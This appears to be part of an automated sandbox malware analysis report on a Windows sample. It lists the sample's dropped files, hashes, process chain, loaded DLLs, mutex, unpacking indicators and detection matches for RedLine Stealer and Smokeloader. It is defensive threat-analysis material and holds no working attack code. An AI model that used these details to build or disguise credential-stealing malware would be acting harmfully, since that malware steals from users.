                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024977173_2_02497717
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024A87DF3_2_024A87DF
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024CD7E73_2_024CD7E7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024BD7E53_2_024BD7E5
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024A144C3_2_024A144C
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C64473_2_024C6447
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024BB4273_2_024BB427
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024AD4D73_2_024AD4D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024994973_2_02499497
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024964B73_2_024964B7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024A95413_2_024A9541
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024CD5573_2_024CD557
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024AC5283_2_024AC528
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024945D73_2_024945D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C5AF73_2_024C5AF7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024CDA973_2_024CDA97
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C9A973_2_024C9A97
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0249CB7E3_2_0249CB7E
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024B5BF73_2_024B5BF7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024A7BA73_2_024A7BA7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0249ABA73_2_0249ABA7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024AD8473_2_024AD847
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024BB75E3_2_024BB75E
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024B08173_2_024B0817
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C58973_2_024C5897
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C48913_2_024C4891
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024BC8B13_2_024BC8B1
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024BC94B3_2_024BC94B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024969473_2_02496947
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024999673_2_02499967
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024AC9213_2_024AC921
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024A99D73_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024989F73_2_024989F7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024BC98D3_2_024BC98D
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024BC99C3_2_024BC99C
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C6E673_2_024C6E67
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_02492E373_2_02492E37
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024B1F773_2_024B1F77
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_02494F173_2_02494F17
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024A8F353_2_024A8F35
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0249DF8C3_2_0249DF8C
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024ADFB73_2_024ADFB7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024ADC473_2_024ADC47
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_02495C573_2_02495C57
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0249FC643_2_0249FC64
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024CBC083_2_024CBC08
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_02493C273_2_02493C27
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024B4CF43_2_024B4CF4
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024B3C9B3_2_024B3C9B
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exe 4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe 4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: String function: 024981D7 appears 78 times
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: String function: 00414060 appears 74 times
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: String function: 00407F70 appears 46 times
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: String function: 024A42C7 appears 74 times
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: String function: 024D0987 appears 53 times
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: String function: 00410720 appears 53 times
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: String function: 0040F903 appears 36 times
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: String function: 024D0019 appears 121 times
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: String function: 0040FDB2 appears 125 times
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7844 -s 612
                  Source: rHrG691f7q.exeBinary or memory string: OriginalFileName vs rHrG691f7q.exe
                  Source: rHrG691f7q.exe, 00000000.00000003.2183049758.0000000002550000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs rHrG691f7q.exe
                  Source: rHrG691f7q.exe, 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs rHrG691f7q.exe
                  Source: rHrG691f7q.exe, 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs rHrG691f7q.exe
                  Source: rHrG691f7q.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000003.00000002.2433571436.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.4623077365.00000000009F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: rHrG691f7q.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 1A68.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@4/7@11/5
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_009F9F46 CreateToolhelp32Snapshot,Module32First,0_2_009F9F46
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,3_2_004361E0
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJIJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeMutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7844
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeFile created: C:\Users\user\AppData\Local\Temp\1A68.tmpJump to behavior
                  Source: rHrG691f7q.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: rHrG691f7q.exeReversingLabs: Detection: 55%
                  Source: rHrG691f7q.exeVirustotal: Detection: 40%
                  Source: unknownProcess created: C:\Users\user\Desktop\rHrG691f7q.exe "C:\Users\user\Desktop\rHrG691f7q.exe"
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeProcess created: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe "C:\Users\user\AppData\Local\Temp\1A68.tmp.exe"
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7844 -s 612
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeProcess created: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe "C:\Users\user\AppData\Local\Temp\1A68.tmp.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeUnpacked PE file: 3.2.1A68.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeUnpacked PE file: 0.2.rHrG691f7q.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeUnpacked PE file: 3.2.1A68.tmp.exe.400000.0.unpack
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_00410766 push ecx; ret 0_2_00410779
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0040FD8C push ecx; ret 0_2_0040FD9F
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_009FF14A pushad ; ret 0_2_009FF166
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_009FF2C8 push ecx; ret 0_2_009FF2E5
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_009FC69C pushad ; ret 0_2_009FC6C4
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_009FCB3D push 00000003h; ret 0_2_009FCB41
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_009FAD92 push es; iretd 0_2_009FADA3
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024D09CD push ecx; ret 0_2_024D09E0
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024F799F push esp; retf 0_2_024F79A7
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024DCE18 push ss; retf 0_2_024DCE1D
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024CFFF3 push ecx; ret 0_2_024D0006
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024F7F9D push esp; retf 0_2_024F7F9E
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041ACF6 push esp; iretd 3_2_0041ACFF
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043F6EE push esp; iretd 3_2_0043F6EF
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043BF00 push eax; mov dword ptr [esp], 49484716h3_2_0043BF01
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_008CD0BD pushad ; ret 3_2_008CD0C2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_008CD343 push ebp; ret 3_2_008CD348
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024CC167 push eax; mov dword ptr [esp], 49484716h3_2_024CC168
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024CF555 push esp; iretd 3_2_024CF556
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024AAF5D push esp; iretd 3_2_024AAF66
                  Source: rHrG691f7q.exeStatic PE information: section name: .text entropy: 7.548735116985004
                  Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.371146835595198
                  Source: 1A68.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.371146835595198
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exeJump to dropped file
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeFile created: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeJump to dropped file
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E974
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
